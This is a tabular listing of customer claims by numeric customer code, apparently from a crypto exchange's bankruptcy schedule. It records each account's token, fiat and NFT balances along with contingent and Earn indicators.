| 07352167 | | BAT[5.52474103], BRZ[5], BTC[0], CUSDT[22], DOGE[0], ETH[.00000001], ETHW[1.96207583], GRT[2.00105965], MATIC[0], NEAR[0.04450170], NFT (315943569978109654/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #57)[1], NFT (398304191958805682/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #59)[1], NFT (439193132148462100/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #52)[1], NFT (512188533059696441/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #73)[1], SHIB[20], SOL[0], TRX[12], USD[4894.95], USDT[0] | Yes | |
| 07352168 | | USD[10.00] | | |
| 07352169 | | ETH[.00000215], ETHW[.00000215], TRX[1], USD[0.00] | Yes | |
| 07352170 | | USD[10.00] | | |
| 07352171 | | BAT[16.00330665], BTC[.00014751], CUSDT[3], DOGE[170.84582599], GRT[6.28818969], LINK[1.1026881], LTC[.38186787], TRX[315.6132655], USD[43.96] | | |
| 07352172 | | USD[10.00] | | |
| 07352173 | | USD[10.00] | | |
| 07352174 | | UNI[0], USD[0.00] | | |
| 07352175 | | USD[10.00] | | |
| 07352176 | | NFT (308186715050108216/Astral Apes #837)[1], NFT (410500859554232095/ALPHA:RONIN #645)[1], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07352177 | | BRZ[1], CUSDT[30], DOGE[3], ETH[.0000002], ETHW[.0000002], LINK[.00001817], SHIB[6], SOL[.23154111], USD[0.01], USDT[3.22284913] | Yes | |
| 07352178 | | BAT[1], BRZ[3], BTC[0.00007527], CUSDT[6], DOGE[1], TRX[2], USD[0.01] | | |
| 07352179 | | BTC[.00018056], USD[0.00] | | |
| 07352180 | | DOGE[188.72973939], USD[0.00] | | |
| 07352181 | | BTC[.00136763], DOGE[5], ETH[.02608066], ETHW[.13998959], SHIB[95], TRX[5], USD[0.00] | Yes | |
| 07352182 | | AUD[0.00], BAT[0], BRZ[2], BTC[0], CUSDT[14], DOGE[0], GRT[2], LINK[0], LTC[0], SOL[0], TRX[11], USD[66.82], USDT[1] | | |
| 07352184 | | USD[10.00] | | |
| 07352185 | | USD[10.00] | | |
| 07352186 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07352187 | | BRZ[1], DOGE[9232.39202364], TRX[1], USD[0.40] | | |
| 07352188 | | AAVE[.03116991], BCH[.06914019], ETH[.0106239], ETHW[.0106239], LINK[.45556901], MATIC[4.6717726], SHIB[6], SOL[.6767459], SUSHI[6.02381919], TRX[297.77704056], USD[0.01], USDT[0], YFI[.00109473] | | |
| 07352189 | | USD[10.00] | | |
| 07352190 | | USD[10.00] | | |
| 07352191 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0], USD[0.00] | | |
| 07352192 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07352193 | | USD[10.00] | | |
| 07352194 | | USD[10.00] | | |
| 07352195 | | CUSDT[3], USD[0.01] | Yes | |
| 07352197 | | CUSDT[2], DOGE[63.52494127], USD[0.00] | | |
| 07352198 | | DOGE[36639.60598197], USD[0.25] | | |
| 07352199 | | USD[10.00] | | |
| 07352200 | | BTC[.00250202], CUSDT[1], DOGE[1.0000083], TRX[1], USD[0.77] | | |
| 07352201 | | BRZ[3], CUSDT[10], DOGE[791.26959669], SHIB[3975267.39949678], TRX[6], USD[0.00] | Yes | |
| 07352202 | | CUSDT[1], TRX[2], USD[0.08] | | |
| 07352203 | | DOGE[24340.11513848], USD[10.00], USDT[1] | | |
| 07352204 | | BRZ[2], CUSDT[10], DOGE[1608.27722689], TRX[10.1079756], USD[0.00] | Yes | |
| 07352205 | | CUSDT[2], DOGE[1958.97609287], ETH[.11348859], ETHW[.11348859], SUSHI[3.48221213], TRX[2], USD[0.00] | | |
| 07352206 | | USD[10.00] | | |
| 07352207 | | DOGE[2], LINK[.54409451], USD[20.42] | | |
| 07352208 | | BAT[0], DOGE[0], ETH[0], GRT[0], TRX[0], USD[0.00] | | |
| 07352209 | | USD[10.00] | | |
| 07352210 | | CUSDT[1], DOGE[3.25430509], SUSHI[16.33105047], TRX[261.94535455], USD[0.43] | | |
| 07352211 | | BRZ[3], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07352212 | | USD[10.00] | | |
| 07352213 | | CUSDT[1], USD[0.00] | | |
| 07352214 | Contingent, Disputed | DOGE[1420.18416533], TRX[2], USD[392.23] | | |
| 07352215 | | USD[5.00] | | |
| 07352216 | | SHIB[838926.17449664], TRX[1], USD[17.71] | | |
| 07352217 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07352218 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352219 | | USD[10.00] | | |
| 07352220 | | USD[0.00] | | |
| 07352221 | | USD[10.00] | | |
| 07352222 | | USD[10.00] | | |
| 07352223 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07352227 | | USD[10.00] | | |
| 07352228 | | USD[10.00] | | |
| 07352229 | | BRZ[0], BTC[0], DOGE[0], ETH[0.10221407], ETHW[0], LTC[9.87327862], USD[38.95] | | |
| 07352230 | | USD[10.00] | | |
| 07352232 | | USD[10.00] | | |
| 07352233 | | USD[10.00] | | |
| 07352234 | | CUSDT[11], DOGE[3.000548], TRX[1.00299566], USD[0.00], USDT[0] | Yes | |
| 07352236 | | BRZ[1], DOGE[3.0785239], USD[0.00] | | |
| 07352237 | | DOGE[40.86293115], USD[5.00] | | |
| 07352238 | | BTC[0], CUSDT[2], TRX[1], USD[10.00] | | |
| 07352239 | | USD[10.00] | | |
| 07352240 | | BAT[1], BTC[.00020995], DOGE[1], TRX[4], USD[0.00] | | |
| 07352241 | | USD[10.00] | | |
| 07352242 | | USD[10.00] | | |
| 07352244 | | BTC[0], DOGE[0], EUR[0.00], MATIC[39.24453424], NFT (31824035531273390 1/2D SOLDIER #2207)[1], SHIB[25.39970729], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07352245 | | USD[10.00] | | |
| 07352246 | | USD[10.00] | | |
| 07352247 | | USD[0.00] | | |
| 07352248 | | DAI[0], DOGE[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07352249 | | BAT[2.06670783], BRZ[1], CUSDT[12], DOGE[13028.04574675], ETH[.00000001], ETHW[3.37248813], GRT[1], SHIB[9720530.59855159], TRX[5], USD[0.00] | Yes | |
| 07352250 | | USD[0.56] | | |
| 07352251 | | USD[10.00] | | |
| 07352252 | | USD[10.00] | | |
| 07352253 | | CUSDT[1], DOGE[6239.91645667], USD[0.00] | Yes | |
| 07352254 | | BTC[.00044266], ETH[.00341423], ETHW[.00337316], USD[7.20] | Yes | |
| 07352255 | | CUSDT[4], TRX[3], USD[0.01] | | |
| 07352256 | | BRZ[1], DOGE[1.94432475], USD[0.00] | | |
| 07352257 | | DOGE[.73333167], USD[11.49] | | |
| 07352258 | | CUSDT[3], DOGE[2642.36157455], USD[0.00] | | |
| 07352259 | | USD[10.00] | | |
| 07352260 | | BTC[0], DOGE[.00276273], TRX[1.49583517], USD[0.02] | | |
| 07352261 | | BAT[0], DOGE[0], GRT[0], SHIB[1691558.28471579], TRX[0], USD[0.00] | Yes | |
| 07352262 | | USD[10.00] | | |
| 07352263 | | DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.01] | | |
| 07352264 | | DOGE[1], USD[0.01] | | |
| 07352265 | | DOGE[2], USD[0.00] | | |
| 07352266 | | USD[10.00] | | |
| 07352267 | | CUSDT[5], SHIB[287820.90436705], USD[0.00] | Yes | |
| 07352268 | | DOGE[771.25102064], USD[0.00] | | |
| 07352269 | | DOGE[.0001602], TRX[1], USD[0.00] | | |
| 07352270 | | BRZ[3], BTC[0], DAI[0], DOGE[2], ETH[0], MATIC[0], MKR[0], SHIB[10], SOL[0], TRX[5], USD[0.00], USDT[0.00006137], YFI[0] | Yes | |
| 07352271 | | USD[0.00] | | |
| 07352272 | | BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0.03753500] | | |
| 07352273 | | USD[10.00] | | |
| 07352274 | | BAT[1], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GBP[0.00], GRT[1], TRX[3], USD[0.00] | | |
| 07352275 | | USD[10.00] | | |
| 07352277 | | BRZ[1], BTC[.00001052], CUSDT[23], DOGE[2.42135714], ETH[.00014023], ETHW[0.00014022], NFT (328290250877761325/Barcelona Ticket Stub #529)[1], NFT (339242354009249413/Cool Bean #3646)[1], NFT (342232773100637112/APEFUEL by Almond Breeze #303)[1], NFT (350378221837310363/CatFamilya #52)[1], NFT (427320566551238420/Anti Social Bot #174)[1], NFT (452045548354905274/ALPHA:RONIN #1225)[1], NFT (505616209552396222/Bahrain Ticket Stub #2352)[1], NFT (518878347581797689/Fancy Frenchies #12)[1], NFT (526333493087598163/Founding Frens Investor #356)[1], NFT (541716918912866075/Oink 401)[1], SHIB[7], SOL[.1586397], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07352279 | | USD[10.00] | | |
| 07352280 | | ETH[.28387871], ETHW[.28368187], TRX[1], USD[0.27] | Yes | |
| 07352281 | | USD[10.00] | | |
| 07352282 | | CUSDT[10], DOGE[747.97862010], TRX[1], USD[0.00] | Yes | |
| 07352283 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352284 | | USD[10.00] | | |
| 07352285 | | BTC[.01619698], CUSDT[3], DOGE[153.95754522], TRX[1], USD[0.00] | Yes | |
| 07352286 | | USD[10.00] | | |
| 07352288 | | USD[10.00] | | |
| 07352289 | | USD[10.00] | | |
| 07352290 | | BRZ[0], BTC[0], DOGE[0], SOL[0], TRX[0], USD[0.00] | | |
| 07352291 | | ETHW[4.30814069], NFT (486255136611922913/DRIP NFT)[1], NFT (568327112653464609/DRIP NFT)[1], USD[1268.26] | Yes | |
| 07352292 | | CUSDT[1], DOGE[1082.71323404], USD[0.00] | Yes | |
| 07352293 | | USD[10.00] | | |
| 07352294 | | USD[10.00] | | |
| 07352295 | | LTC[.05127879], USD[0.00] | | |
| 07352297 | | USD[10.00] | | |
| 07352298 | | USD[10.00] | | |
| 07352299 | | CUSDT[3], DOGE[0], ETH[0], USD[0.00] | | |
| 07352300 | | BTC[0.01201151], ETH[0.04240139], ETHW[0.04240139], SHIB[758572.84268179], USD[0.62], USDT[0] | | |
| 07352301 | | DOGE[1], USD[51.81] | | |
| 07352302 | | USD[10.00] | | |
| 07352303 | | USD[10.00] | | |
| 07352304 | | BRZ[5.21849935], CUSDT[46.33447933], DOGE[10.73602386], TRX[11.67229018], USD[4.00] | | |
| 07352305 | | BRZ[1], TRX[3], USD[0.57] | | |
| 07352306 | | BTC[0], CUSDT[4], DOGE[0], ETH[.00003101], ETHW[.00003101], TRX[1], USD[0.00] | | |
| 07352307 | | DOGE[31.79932741], USD[0.00] | | |
| 07352308 | | CUSDT[0], DOGE[22.90297287], USD[0.00] | | |
| 07352309 | | USD[10.00] | | |
| 07352310 | | CUSDT[5], DOGE[962.7434401], ETH[.02715969], ETHW[.02681809], LTC[.25272232], TRX[2], USD[0.00] | Yes | |
| 07352311 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07352312 | | DOGE[.0008449], USD[0.03] | | |
| 07352314 | | DOGE[777.35206318], USD[0.00] | | |
| 07352315 | | USD[10.00] | | |
| 07352316 | | TRX[67.7079426], USD[0.00] | | |
| 07352317 | | DOGE[781.16099564], TRX[1], USD[0.00] | | |
| 07352318 | | USD[10.00] | | |
| 07352319 | | DOGE[44681.2709951], USD[0.00] | | |
| 07352320 | | USD[13.00] | | |
| 07352321 | | DOGE[238.85998324], TRX[1903.15661682], USD[0.00] | | |
| 07352322 | | BRZ[3], CUSDT[1], DOGE[20593.12924299], TRX[2], USD[0.00] | | |
| 07352323 | | BRZ[4], BTC[.00004969], CUSDT[26], DOGE[0.17442443], ETH[.00065167], ETHW[.00065167], GRT[1], LINK[3.36006844], LTC[.0079095], USD[8.58] | | |
| 07352324 | | CUSDT[1], DOGE[483.33531704], ETH[0], USD[0.00] | Yes | |
| 07352325 | | DOGE[1], TRX[68.4779542], USD[0.00] | | |
| 07352326 | | USD[10.00] | | |
| 07352327 | | USD[10.00] | | |
| 07352329 | | BRZ[1], CUSDT[3], DOGE[22180.48284876], GRT[1.00367791], TRX[14734.38845048], USD[0.00], USDT[1.09848904] | Yes | |
| 07352330 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07352331 | | BAT[118.56553427], CUSDT[2547.96489285], DOGE[1279.55310145], MATIC[110.70514297], SHIB[1602636.45518594], SOL[24.36874388], TRX[694.04179955], USD[1015.49] | Yes | |
| 07352332 | | CUSDT[1], TRX[1], USD[0.11] | | |
| 07352333 | | BRZ[1], SHIB[0], USD[11.05] | Yes | |
| 07352334 | | USD[10.00] | | |
| 07352335 | | CUSDT[1], DOGE[1], GRT[5.60841838], USD[0.01] | Yes | |
| 07352336 | | DOGE[150.00001435], USD[8.16] | | |
| 07352337 | | USD[0.98], USDT[0] | | |
| 07352338 | | USD[10.00] | | |
| 07352339 | | BAT[0], BRZ[1], BTC[0], CUSDT[8], DOGE[574.52450514], ETH[0], ETHW[0], LINK[0], PAXG[0], TRX[2], USD[0.00], YFI[0] | | |
| 07352340 | | USD[10.00] | | |
| 07352341 | | DOGE[1], USD[0.01], USDT[1] | | |
| 07352342 | | CUSDT[1], DOGE[9268.74352278], USD[0.00] | | |
| 07352343 | | USD[0.00] | | |
| 07352344 | | DOGE[807.05161536], USD[0.19] | | |
| 07352345 | | ETH[.00389421], ETHW[.00383949], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352347 | | BRZ[1], DOGE[2], GRT[178.91749698], TRX[1], USD[0.00] | | |
| 07352348 | | DOGE[23.47957043], USD[0.00] | | |
| 07352349 | | DOGE[35.12658162], USD[0.00] | | |
| 07352350 | | CUSDT[3], DOGE[521.26474265], USD[0.00] | Yes | |
| 07352351 | | USD[0.21] | | |
| 07352352 | | USD[10.00] | | |
| 07352353 | | BRZ[1], CUSDT[5], DOGE[1.71372868], SOL[1.14035682], TRX[324.3291975], USD[0.91] | | |
| 07352354 | | DOGE[.43301343], USD[0.21] | | |
| 07352355 | | BTC[0], DOGE[2], TRX[1], USD[0.00] | | |
| 07352356 | | DOGE[385.68834435], TRX[71.55460976], USD[0.00] | | |
| 07352357 | | USD[10.00] | | |
| 07352358 | | DOGE[6852.88535419], TRX[1], USD[0.84] | | |
| 07352359 | | USD[10.28] | | |
| 07352360 | | BAT[2], BRZ[15], CUSDT[347], GRT[1], TRX[48], USD[0.01] | | |
| 07352361 | | BRZ[1], CUSDT[2], TRX[2], USD[0.01] | | |
| 07352362 | | USD[10.00] | | |
| 07352363 | | USD[10.00] | | |
| 07352364 | | DOGE[1], USD[0.00] | | |
| 07352366 | | TRX[1729.33096073], USD[0.00] | Yes | |
| 07352367 | | USD[10.00] | | |
| 07352368 | | DOGE[1], TRX[1], USD[18.45] | | |
| 07352369 | | USD[10.00] | | |
| 07352370 | | DOGE[1], USD[9.96] | | |
| 07352371 | | BRZ[1], CUSDT[5], TRX[2], USD[0.01] | | |
| 07352372 | | USD[11.97] | | |
| 07352374 | | USD[10.00] | | |
| 07352375 | | BAT[0], BRZ[2], BTC[0], CUSDT[4], DOGE[0], ETH[0], SUSHI[0], TRX[7], USD[0.01], USDT[1] | | |
| 07352376 | | BTC[.0002193], USD[0.00] | | |
| 07352377 | | CUSDT[1], DOGE[376.58510138], TRX[202.32913203], USD[0.01], USDT[1] | | |
| 07352378 | | USD[10.00] | | |
| 07352379 | | CUSDT[238.18568745], USD[0.00] | | |
| 07352380 | | USD[10.00] | | |
| 07352381 | | BRZ[1], BTC[.0005], CUSDT[2], DOGE[3], ETH[.02359776], ETHW[.02330797], TRX[118.0036438], USD[0.00] | Yes | |
| 07352383 | | USD[10.00] | | |
| 07352384 | | USD[10.00] | | |
| 07352386 | | SUSHI[.69727652], USD[0.00] | Yes | |
| 07352387 | | USD[10.00] | | |
| 07352388 | | USD[0.00] | | |
| 07352389 | | USD[10.00] | | |
| 07352390 | | CUSDT[2], DOGE[644.72000998], TRX[1], USD[10.00] | | |
| 07352391 | | USD[10.00] | | |
| 07352392 | | BTC[0], DOGE[0], UNI[0], USD[0.00] | | |
| 07352393 | | DOGE[319.60382793], USD[7.19] | Yes | |
| 07352394 | | USD[10.00] | | |
| 07352395 | | DOGE[1], USD[0.01] | | |
| 07352396 | | CUSDT[18.56424795], LTC[0], SOL[0], USD[0.01] | | |
| 07352397 | | SHIB[1170147.7456087], USD[0.18] | Yes | |
| 07352398 | | USD[10.00] | | |
| 07352399 | | DOGE[.21966777], ETH[0], LTC[0], SHIB[39.32073935], USD[0.00] | Yes | |
| 07352401 | | USD[10.00] | | |
| 07352402 | | SOL[0], USD[0.00], USDT[0] | | |
| 07352403 | | TRX[1], USD[149.69] | | |
| 07352404 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07352405 | | BAT[0.00013448], BRZ[0], BTC[0], CUSDT[11], DOGE[4.28616534], ETH[0], GRT[58.12620724], MATIC[0], SOL[0], SUSHI[10.54635685], UNI[10.02727298], USD[0.00] | Yes | |
| 07352407 | | USD[10.00] | | |
| 07352408 | | DOGE[1295.78381663], USD[0.00] | | |
| 07352409 | | DOGE[132.2988185], USD[10.00] | | |
| 07352411 | | CUSDT[4], DOGE[3471.00974199], SHIB[18126197.09580518], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352412 | | CUSDT[3], DOGE[1], USD[0.00], USDT[1] | | |
| 07352413 | | USD[0.01], USDT[0] | | |
| 07352414 | | USD[10.00] | | |
| 07352415 | | USD[10.00] | | |
| 07352416 | | BRZ[1], TRX[1], USD[35.31] | | |
| 07352417 | | USD[10.00] | | |
| 07352418 | | USD[10.00] | | |
| 07352419 | | DOGE[14.28121452], USD[0.71] | | |
| 07352420 | | USD[10.00] | | |
| 07352421 | | USD[10.00] | | |
| 07352422 | | USD[10.00] | | |
| 07352423 | | USD[0.00], USDT[0] | | |
| 07352424 | | BRZ[3], CUSDT[5], SUSHI[.35940857], TRX[1], USD[0.01] | | |
| 07352425 | | DOGE[2422.81825755], USD[10.00] | | |
| 07352426 | | NFT (415949266132235712/Bahrain Ticket Stub #490)[1], SHIB[970857.09629391], USD[0.00] | | |
| 07352427 | | USD[10.00] | | |
| 07352428 | | BRZ[0.00000072], BTC[0], DOGE[0], ETH[0], GRT[0], UNI[0], USD[0.00] | | |
| 07352430 | | USD[10.00] | | |
| 07352431 | | DOGE[1], USD[0.00] | | |
| 07352433 | | USD[10.00] | | |
| 07352435 | | BTC[.00005558], DOGE[.036], ETH[.000948], ETHW[.000948], LINK[.08] | | |
| 07352437 | | USD[10.00] | | |
| 07352438 | | USD[0.00], USDT[0] | | |
| 07352439 | | BTC[.00097048], CUSDT[3], DOGE[1933.67193449], ETH[.00980056], ETHW[.00980056], LTC[.12700768], MATIC[7.20762688], TRX[1], USD[0.00] | | |
| 07352441 | | CUSDT[1], DOGE[154.90368847], USD[9.24] | | |
| 07352443 | | USD[10.00] | | |
| 07352444 | | BRZ[2], CUSDT[2], DOGE[1645.77937062], TRX[.67617404], USD[10.69] | | |
| 07352445 | | DOGE[1.02269379], TRX[1], USD[0.01] | | |
| 07352446 | | DOGE[25.39944207], USD[0.00] | | |
| 07352447 | | USD[10.00] | | |
| 07352448 | | USD[10.00] | | |
| 07352449 | | USD[10.00] | | |
| 07352450 | | USD[10.00] | | |
| 07352451 | | CUSDT[5], DOGE[1120.42823407], KSHIB[838.21509806], SHIB[908228.48391147], SOL[1.10011487], TRX[2], USD[79.50] | Yes | |
| 07352452 | | USD[86.73] | Yes | |
| 07352453 | | CUSDT[3], DOGE[1.00003544], USD[0.00] | | |
| 07352454 | | USD[10.00] | | |
| 07352455 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07352456 | | BAT[2.11718532], BRZ[4], BTC[0], CUSDT[9], DOGE[2], ETH[0.00001475], ETHW[0.00001475], TRX[10.01864495], USD[0.01], USDT[1.10234799] | Yes | |
| 07352457 | | USD[10.00] | | |
| 07352458 | | USD[10.00] | | |
| 07352459 | | USD[10.00] | | |
| 07352460 | | BRZ[2], CUSDT[6], DOGE[2147.4208232], GRT[1], TRX[352.9761929], USD[0.00] | | |
| 07352461 | | USD[10.00] | | |
| 07352462 | | DOGE[1.00606651], USD[0.00] | | |
| 07352464 | | DOGE[384.74943490], TRX[.00004478], USD[0.00] | Yes | |
| 07352465 | | DOGE[1042.37746311], GRT[1], SHIB[5684626.18773946], TRX[1], USD[0.00] | | |
| 07352466 | | TRX[1], USD[0.00], USDT[0] | | |
| 07352467 | | USD[10.00] | | |
| 07352468 | | USD[10.00] | | |
| 07352469 | | USD[10.00] | | |
| 07352470 | | USD[0.01] | | |
| 07352471 | | GRT[1.00498957], USD[0.00] | Yes | |
| 07352472 | | USD[10.00] | | |
| 07352473 | | BTC[.00131328], CUSDT[1], DOGE[1054.17733813], USD[24.74] | | |
| 07352474 | | USD[0.03], USDT[0] | Yes | |
| 07352475 | | USD[10.00] | | |
| 07352476 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352478 | | DOGE[0], TRX[0], UNI[0], USD[0.01] | | |
| 07352479 | | USD[10.00] | | |
| 07352480 | | USD[10.00] | | |
| 07352481 | | BRZ[1], BTC[.0001992], CUSDT[1], DOGE[2060.62516667], USD[0.00] | | |
| 07352482 | | DOGE[5], GRT[247.36952742], TRX[1], USD[0.00], USDT[0] | | |
| 07352483 | | USD[10.00] | | |
| 07352484 | | USD[10.00] | | |
| 07352485 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07352486 | | USD[10.00] | | |
| 07352487 | | USD[10.00] | | |
| 07352488 | | USD[10.00] | | |
| 07352489 | | BRZ[0], BTC[0], CUSDT[2.02143681], DOGE[0], ETH[0], TRX[4], USD[0.00] | | |
| 07352490 | | DOGE[0.31002864], ETH[0], USD[0.00] | | |
| 07352491 | | BTC[.0003984], DOGE[1665.50468245], ETH[.006501], ETHW[.006501], LTC[.07385723], USD[0.26], USDT[0] | | |
| 07352492 | | CUSDT[19], DOGE[.00229156], TRX[238.5213624], USD[16.48] | Yes | |
| 07352493 | | BTC[0], LTC[0], USDT[0.00000130] | | |
| 07352494 | | CUSDT[1], DOGE[2], USD[0.01], USDT[0.00000001] | | |
| 07352495 | | USD[10.00] | | |
| 07352496 | | USD[10.00] | | |
| 07352497 | | USD[10.00] | | |
| 07352498 | | DOGE[1.2732444], USD[31.94] | | |
| 07352499 | | CUSDT[36.08371442], DOGE[1.54306652], TRX[1], USD[0.44] | | |
| 07352500 | | USD[10.00] | | |
| 07352501 | | USD[10.00] | | |
| 07352502 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07352503 | | BTC[.00053644], CUSDT[2], DOGE[.36777028], TRX[1], USD[0.01] | | |
| 07352504 | | USD[10.00] | | |
| 07352505 | | CUSDT[2], USD[0.01] | | |
| 07352506 | | USD[10.00] | | |
| 07352507 | | CUSDT[1], DOGE[63.88663083], TRX[1], USD[0.02] | | |
| 07352508 | | CUSDT[3], TRX[1], USD[0.02] | | |
| 07352509 | | USD[10.00] | | |
| 07352510 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[4.33769937], UNI[0], USD[0.00] | | |
| 07352511 | | CUSDT[4], USD[0.90], USDT[1] | | |
| 07352512 | | CUSDT[1], DOGE[496.94374219], LINK[98.75213024], USD[0.00] | Yes | |
| 07352513 | | USD[10.00] | | |
| 07352514 | | CUSDT[2], ETH[1.78189061], ETHW[1.78114219], GRT[981.8312077], LINK[48.45647743], LTC[6.46822793], MATIC[451.91034615], SUSHI[4.02733951], TRX[1844.14668268], USD[0.00] | Yes | |
| 07352515 | | CUSDT[3], DOGE[78.72500744], USD[0.01] | | |
| 07352516 | | BAT[.00078866], BRZ[3], BTC[.00000823], CUSDT[10.00002457], DOGE[905.00769836], GRT[.00006526], LINK[.20909186], LTC[.00000054], TRX[4.00035259], UNI[.00004088], USD[0.31] | | |
| 07352517 | | USD[10.00] | | |
| 07352518 | | USD[10.00] | | |
| 07352519 | | USD[0.23] | Yes | |
| 07352520 | | USD[10.00] | | |
| 07352521 | | CUSDT[1], DOGE[10.18000892], USD[0.01], USDT[0] | | |
| 07352524 | | DOGE[1.00001551], USD[0.01] | | |
| 07352525 | | USD[10.00] | | |
| 07352526 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07352527 | | DOGE[0], USD[0.00] | | |
| 07352529 | | AVAX[.00000944], BAT[.00098751], BRZ[3], CUSDT[13], DOGE[.005317], ETH[.00000036], ETHW[.00000036], LTC[.00000217], SHIB[6397281.52429679], SOL[.00000669], SUSHI[.00000735], TRX[4], UNI[0.02009067], USD[3.70], USDT[.00592854] | Yes | |
| 07352530 | | USD[10.00] | | |
| 07352531 | | USD[0.00] | | |
| 07352532 | | TRX[81.07137442], USD[0.00] | | |
| 07352533 | | USD[10.00] | | |
| 07352535 | | DOGE[1561.30351878], USD[0.00] | Yes | |
| 07352536 | | BTC[.00019242], USD[0.00] | | |
| 07352537 | | GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07352538 | | CUSDT[1], DOGE[1], TRX[1], USD[73.84] | | |
| 07352539 | | DOGE[206.36231519], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352540 | | USD[0.00] | | |
| 07352541 | | BAT[1.0165555], BRZ[1], BTC[.10847425], CUSDT[10], ETH[.35585341], ETHW[.35570391], GRT[1.00367791], TRX[9.04711415], USD[0.00] | Yes | |
| 07352542 | | BRZ[0], DOGE[0], SHIB[1], USD[222.62] | Yes | |
| 07352543 | | USD[10.00] | | |
| 07352544 | | USD[7.72] | | |
| 07352545 | | CUSDT[1], DOGE[.16118492], USD[0.61] | | |
| 07352546 | | BRZ[2], CUSDT[1], DOGE[.00003238], TRX[1], USD[0.00] | | |
| 07352548 | | DOGE[1314.21047582], USD[0.00] | Yes | |
| 07352549 | | GRT[1], TRX[77.12756672], USD[0.00] | | |
| 07352550 | | DOGE[20.28011042], TRX[1], USD[21.89] | Yes | |
| 07352552 | | USD[0.00] | | |
| 07352553 | | USD[10.00] | | |
| 07352554 | | BRZ[1], CUSDT[4], GRT[1], SHIB[8104295.35494327], TRX[207.08299291], USD[0.00] | | |
| 07352555 | | DOGE[.72006614], USD[0.00] | | |
| 07352556 | | CUSDT[3], DOGE[152.36523704], TRX[1], USD[0.63] | | |
| 07352557 | | DOGE[24.90735323], USD[0.01] | | |
| 07352559 | | DOGE[167.21509113], USD[0.00] | | |
| 07352560 | | USD[10.00] | | |
| 07352562 | | DOGE[135.52111391], USD[0.00] | | |
| 07352563 | | CUSDT[2], GRT[1], LINK[1], TRX[1], USD[0.67] | | |
| 07352564 | | USD[10.00] | | |
| 07352565 | | USD[10.00] | | |
| 07352566 | | USD[10.00] | | |
| 07352567 | | USD[10.00] | | |
| 07352568 | | DOGE[2], USD[0.07] | | |
| 07352569 | | USD[25.00] | | |
| 07352570 | | DOGE[1274.94734367], USD[10.00] | | |
| 07352571 | | USD[10.00] | | |
| 07352572 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07352573 | | CUSDT[4], DOGE[1.0034629], ETH[0.24321657], ETHW[0.24301899], SHIB[324413.89784716], TRX[3], USD[0.00] | Yes | |
| 07352574 | | CUSDT[1021.27356586], DOGE[19.24672922], USD[0.00] | Yes | |
| 07352575 | | CUSDT[4], DOGE[20942.69530619], TRX[2], USD[0.30] | | |
| 07352576 | | USD[0.00] | Yes | |
| 07352577 | | USD[10.00] | | |
| 07352578 | | BRZ[3], CUSDT[4], DOGE[.97664042], NFT (385596728384101808/Fat Regular Person  #8)[1], NFT (385895103872400552/Fat super)[1], NFT (458022109377921705/Fat Regular Person  #2)[1], NFT (532792206119358745/Crypto Infinite  #10)[1], SHIB[104.73620372], TRX[4], USD[0.07] | Yes | |
| 07352579 | | DOGE[25.55508715], USD[0.00] | | |
| 07352580 | | USD[10.00] | | |
| 07352581 | Contingent, Disputed | USD[10.00] | | |
| 07352582 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07352583 | | USD[10.00] | | |
| 07352584 | | BRZ[2248.91871787], CUSDT[11], DOGE[4085.50793507], TRX[1791.52377049], USD[0.00], USDT[2] | | |
| 07352585 | | USD[10.00] | | |
| 07352586 | | BRZ[1], BTC[.00130701], CUSDT[27], DOGE[65.11138706], ETH[.01606105], ETHW[.01606105], TRX[108.06595268], USD[23.72] | | |
| 07352587 | | USD[10.00] | | |
